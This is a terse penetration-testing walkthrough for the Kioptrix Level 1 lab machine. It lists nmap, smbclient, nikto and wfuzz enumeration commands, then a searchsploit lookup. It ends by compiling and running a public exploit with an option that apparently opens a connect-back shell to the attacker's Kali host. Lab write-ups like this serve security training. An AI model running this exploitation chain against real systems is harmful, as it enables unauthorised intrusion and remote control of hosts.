Cu3rv0x
Kioptrix Level 1

Kioptrix Level 1


HTB Linux

netdiscover -r 10.0.0.0/24

ssh_command.

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn kioptrix.local -oG allPorts

ssh_command.

nmap -sCV -p22,80,111,139,443,32768 kioptrix.local -oN targeted

ssh_command.

smbclient -L kioptrix.local -N

ssh_command.

nikto -h kioptrix.local

ssh_command.

wfuzz -c -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://kioptrix.local/FUZZ

ssh_command.

Pero no salio nada interesante.

searchsploit apache 1.3.2

ssh_command.

searchsploit -m 10

gcc 10.c -o kioptrix_level1

chmod +x kioptrix_level1

./kioptrix_level1

ssh_command.

./kioptrix_level1 -b=0 -c <kali_ip> <kioptrix_ip>

whoami

ssh_command.

© 2024 Cu3rv0x